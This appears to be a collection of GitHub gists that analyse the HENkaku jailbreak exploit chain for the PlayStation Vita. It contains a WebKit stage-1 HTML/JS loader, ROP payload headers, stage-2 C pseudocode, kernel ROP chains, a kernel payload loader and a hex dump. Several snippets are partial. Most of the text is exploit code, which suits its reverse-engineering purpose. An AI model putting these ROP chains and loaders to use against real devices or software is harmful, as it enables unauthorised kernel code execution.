@hexkyz
hexkyz / henkaku_index.html
Created October 19, 2016 18:16
HENkaku - Stage 1 (HTML code)
<script src='payload.js'></script>
<script>
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4; /* 476 */
@hexkyz
hexkyz / henkaku_payload_bin.txt
Created October 19, 2016 18:18
HENkaku - Stage 1 (JS payload)
[HEADER] (0x40 bytes)
0x524f507e -> ROP~
0x01000100 -> Version
0x00000000 -> NULL
0x00000000 -> NULL
0x00000730 -> No reloc
0x00000000 -> NULL
0x00000000 -> NULL
0x00000000 -> NULL
0x000003F8 -> No reloc
@hexkyz
hexkyz / henkaku_stage3_krop.txt
Created October 19, 2016 18:36
HENkaku - Stage 3 (Kernel ROP)
// Kernel ROP chain
/*
scesysmem_base + 0x00000347
POP {PC}
*/
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC
/*
scesysmem_base + 0x00000031
POP {R0,PC}
@hexkyz
hexkyz / henkaku_stage2.c
Last active October 19, 2016 18:45
HENkaku - Stage 2
// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");
// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);
// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");
@hexkyz
hexkyz / henkaku_stage2_partial.c
Last active October 19, 2016 18:46
HENkaku - Stage 1 (Pre-analysis of stage 2)
strcpy(stack_base + 0x000086B4, "sdstor0:");
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");
// Do stuff
...
strcpy(stack_base + 0x000086E4, "molecule0:");
SceLibKernel_a4ad("molecule0:");
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);
@hexkyz
hexkyz / henkaku_http_loader.c
Last active October 19, 2016 18:47
HENkaku - Stage 1 (HTTP loader)
// Do stuff
...
// Create a new thread for the second payload
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000);
// Do stuff
...
// Construct the arguments for fetching the second payload
@hexkyz
hexkyz / henkaku_stage3_pseudocode.c
Created October 19, 2016 18:48
HENkaku - Stage 3 (Pseudo-code)
// Allocate a new memory block
char* memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void* memblock_opts = NULL;
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);
// Retrieve the memory block's address into a buffer (the buffer must exist before the call)
uint32_t out_buf[1] = {0};
kern_memblock_getaddr(memblock_id, out_buf);
@hexkyz
hexkyz / henkaku_stage3_kxloader.c
Created October 19, 2016 18:50
HENkaku - Stage 3 (Kernel loader)
// Entry point
sub_00000010(scesysmem_base, payload_addr)
{
r4 = scesysmem_base
sub_00000356();
r5 = scesysmem_base >> 0x20
sub_0000035A();
// Decrypt and launch HENkaku's payload
@hexkyz
hexkyz / henkaku_stage2_rop.txt
Created October 19, 2016 19:12
HENkaku - Stage 2 (ROP chain)
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43
0x00000000: 00 02 20 9F 80 05 08 00 E0 59 00 00 97 11 49 00
0x00000010: A8 05 30 00 80 05 08 00 00 00 00 00 09 50 49 00
0x00000020: 00 C9 21 00 00 C9 21 00 C0 8B 21 00 80 A5 21 00
0x00000030: C0 8B 21 00 80 A5 21 00 00 B2 20 00 C0 65 20 00
0x00000040: 00 B2 20 00 C0 65 20 00 C0 65 20 00 C0 65 20 00
0x00000050: C0 65 20 00 C0 65 20 00 C0 21 20 00 C0 65 20 00
0x00000060: C0 21 20 00 C0 65 20 00 00 47 20 00 00 47 20 00
0x00000070: 00 47 20 00 00 47 20 00 C0 95 20 00 00 47 20 00
0x00000080: C0 95 20 00 00 47 20 00 40 0B 20 00 40 0B 20 00
0x00000090: 40 0B 20 00 40 0B 20 00 40 31 20 00 40 0B 20 00